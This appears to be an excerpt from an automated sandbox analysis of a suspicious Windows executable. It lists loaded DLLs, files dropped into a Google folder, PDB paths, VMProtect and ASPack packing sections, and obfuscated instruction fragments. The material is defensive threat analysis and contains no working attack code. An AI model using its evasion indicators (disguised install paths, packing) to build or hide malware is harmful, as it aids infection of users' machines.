      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: oledlg.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: windowscodecs.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: ieframe.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: version.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: dataexchange.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: d3d11.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: dcomp.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: dxgi.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: msiso.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: mshtml.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: profext.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: mlang.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: srpapi.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: msimtf.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: d2d1.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: dwrite.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: resourcepolicyclient.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: d3d10warp.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: dxcore.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: wsock32.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: msxml3.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: uiautomationcore.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: jscript9.dllJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSection loaded: fltlib.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile written: C:\Users\user\Desktop\CFA702\D2EDCA7E\C8C6753\D74384.iniJump to behavior
      Source: VIP-#U4f1a#U5458#U7248.exeStatic file information: File size 21878788 > 1048576
      Source: VIP-#U4f1a#U5458#U7248.exeStatic PE information: Raw size of .data31 is bigger than: 0x100000 < 0x14d8c00
      Source: VIP-#U4f1a#U5458#U7248.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: G:\projects\funny\GamePluginCtrl\Release\gamePluginCtrl.pdb source: D74384FB8D2C9.exe, D74384FB8D2C9.exe, 00000002.00000003.2336822343.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2841831298.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2098003349.0000000005650000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2110668560.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117568141.000000000564E000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2106887093.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2097391603.0000000005635000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2124972973.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2213442539.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2125866187.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2110514398.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2106102550.0000000005650000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2219458854.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2125707363.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4567640195.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2100380408.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2110292883.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117790220.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2100550998.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2106586251.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.000000000564D000.00000004.00000020.00020000.00000000.sdmp, A2F0jleks.dll.2.dr
      Source: Binary string: \bin\xkSHWL.pdb source: D74384FB8D2C9.exe, 00000002.00000003.2125803402.0000000005649000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2125707363.0000000005647000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2125941640.0000000005649000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2125803402.0000000005635000.00000004.00000020.00020000.00000000.sdmp, E875FIB50.dll.2.dr
      Source: Binary string: DPK\bin\dlq.pdb source: D74384FB8D2C9.exe, 00000002.00000003.2124316210.0000000005635000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2124316210.0000000005647000.00000004.00000020.00020000.00000000.sdmp, 5801srmps.dll.2.dr
      Source: Binary string: DPK\bin\DPK.pdbL source: FC14NMPKD.dll.2.dr
      Source: Binary string: G:\projects\G\tools\emptyDll\Release\emptyDll.pdb @ source: D74384FB8D2C9.exe, 00000002.00000003.2117661174.0000000005638000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118239113.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117661174.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118127196.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118216832.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118035942.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118016119.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117790220.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117907299.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117731532.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117995127.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118264440.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117568141.0000000005647000.00000004.00000020.00020000.00000000.sdmp, 4509OKKGD.dll.2.dr, 21AAtnoki.dll.2.dr, 346DgjhcV.dll.2.dr
      Source: Binary string: DPK\bin\DPK.pdb source: FC14NMPKD.dll.2.dr
      Source: Binary string: DPK\bin\JDClient.pdb source: 8FD7ijlhc.exe.2.dr
      Source: Binary string: G:\projects\G\tools\emptyDll\Release\emptyDll.pdb source: D74384FB8D2C9.exe, 00000002.00000003.2117661174.0000000005638000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118239113.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117661174.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118127196.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118216832.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118035942.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118016119.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117790220.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117907299.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117731532.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117995127.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118264440.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117568141.0000000005647000.00000004.00000020.00020000.00000000.sdmp, 4509OKKGD.dll.2.dr, 21AAtnoki.dll.2.dr, 346DgjhcV.dll.2.dr

      Data Obfuscation

      barindex
      Sample is protected by VMProtect
      Source: F977IID54.dll.2.drStatic PE information: Section: .vmp1 IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: F04bWTUR.dll.2.drStatic PE information: Section: .vmp1 IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: 5B38DA6A8.dll.2.drStatic PE information: Section: .vmp1 IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: E875FIB50.dll.2.drStatic PE information: Section: .vmp1 IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6D8340 ReadProcessMemory,LoadLibraryA,GetProcAddress,ReadProcessMemory,FreeLibrary,2_2_6A6D8340
      Source: initial sampleStatic PE information: section where entry point is pointing to: .data31
      Source: VIP-#U4f1a#U5458#U7248.exeStatic PE information: section name: .data30
      Source: VIP-#U4f1a#U5458#U7248.exeStatic PE information: section name: .data31
      Source: D74384FB8D2C9.exe.0.drStatic PE information: section name: 0DE
      Source: D74384FB8D2C9.exe.0.drStatic PE information: section name: 1TA
      Source: D74384FB8D2C9.exe.0.drStatic PE information: section name: 2S
      Source: D74384FB8D2C9.exe.0.drStatic PE information: section name: 3data
      Source: D74384FB8D2C9.exe.0.drStatic PE information: section name: 4ls
      Source: D74384FB8D2C9.exe.0.drStatic PE information: section name: 5data
      Source: D74384FB8D2C9.exe.0.drStatic PE information: section name: 6eloc
      Source: D74384FB8D2C9.exe.0.drStatic PE information: section name: 7src
      Source: D74384FB8D2C9.exe.0.drStatic PE information: section name: 8ext
      Source: D74384FB8D2C9.exe.0.drStatic PE information: section name: 9data
      Source: D74384FB8D2C9.exe.0.drStatic PE information: section name: 10ta
      Source: VIP-#U4f1a#U5458#U7248.exe.2.drStatic PE information: section name: .data30
      Source: VIP-#U4f1a#U5458#U7248.exe.2.drStatic PE information: section name: .data31
      Source: 22FD558C8.sys.2.drStatic PE information: section name: .spa0
      Source: 22FD558C8.sys.2.drStatic PE information: section name: .spa1
      Source: D74384F.sys.2.drStatic PE information: section name: .spa0
      Source: D74384F.sys.2.drStatic PE information: section name: .spa1
      Source: FC14NMPKD.dll.2.drStatic PE information: section name: .vmp0
      Source: E816IBB62.dll.2.drStatic PE information: section name: .vmp0
      Source: F977IID54.dll.2.drStatic PE information: section name: .vmp0
      Source: F977IID54.dll.2.drStatic PE information: section name: .vmp1
      Source: F04bWTUR.dll.2.drStatic PE information: section name: .vmp0
      Source: F04bWTUR.dll.2.drStatic PE information: section name: .vmp1
      Source: 8FD7ijlhc.exe.2.drStatic PE information: section name: .vmp0
      Source: 8FD7ijlhc.exe.2.drStatic PE information: section name: .vmp1
      Source: 5B38DA6A8.dll.2.drStatic PE information: section name: .vmp0
      Source: 5B38DA6A8.dll.2.drStatic PE information: section name: .vmp1
      Source: C945E611y.dll.2.drStatic PE information: section name: .didata
      Source: C945E611y.dll.2.drStatic PE information: section name: .aspack
      Source: C945E611y.dll.2.drStatic PE information: section name: .adata
      Source: A2F0jleks.dll.2.drStatic PE information: section name: .vvvt0
      Source: A2F0jleks.dll.2.drStatic PE information: section name: .vvvt1
      Source: D5AESTNHE.dll.2.drStatic PE information: section name: .vmp0
      Source: 5801srmps.dll.2.drStatic PE information: section name: .vmp0
      Source: 5801srmps.dll.2.drStatic PE information: section name: .vmp1
      Source: E875FIB50.dll.2.drStatic PE information: section name: .vmp0
      Source: E875FIB50.dll.2.drStatic PE information: section name: .vmp1
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BF42BCB push dword ptr [esp+44h]; retn 0048h2_2_0BF42BE1
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BF08BA1 pushfd ; mov dword ptr [esp], D85E82B4h2_2_0BF08BA9
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BEEAA94 pushfd ; mov dword ptr [esp], edi2_2_0BEEAAA4
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0C0A0D91 pushfd ; mov dword ptr [esp], edi2_2_0C0A1BD1
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0C0A8DBD push dword ptr [esp+10h]; retn 001Ch2_2_0C0A8DE3
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BEB2A0C push 0BEB2C90h; ret 2_2_0BEB2C88
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BEA09A4 push 0BEA0DF0h; ret 2_2_0BEA0DE8
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BFAA880 push dword ptr [esp+1Ch]; retn 0020h2_2_0BFAA891
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BF0887D push dword ptr [esp+14h]; retn 0018h2_2_0BF0889A
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0C0AA80D push dword ptr [esp+30h]; retn 0034h2_2_0C0AA81B
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BEB0F88 push ecx; mov dword ptr [esp], edx2_2_0BEB0F8D
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BEA0E6C push 0BEA0EA0h; ret 2_2_0BEA0E98
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BFF0E4D pushfd ; mov dword ptr [esp], edi2_2_0C0A1BD1
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BEA0DF2 push 0BEA0E63h; ret 2_2_0BEA0E5B
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BE96DC0 push 0BE96E11h; ret 2_2_0BE96E09
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BF74D8C push dword ptr [esp+34h]; retn 0038h2_2_0BF74DD4
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BFA8CFD push dword ptr [esp+34h]; retn 0038h2_2_0BFA8D4D
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BEF0384 push ebp; mov dword ptr [esp], BD2EF39Fh2_2_0BF4B823
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BEAC320 push ecx; mov dword ptr [esp], ecx2_2_0BEAC325
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BE9A2EC push 0BE9A608h; ret 2_2_0BE9A600
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BEAA2E0 push ecx; mov dword ptr [esp], edx2_2_0BEAA2E5
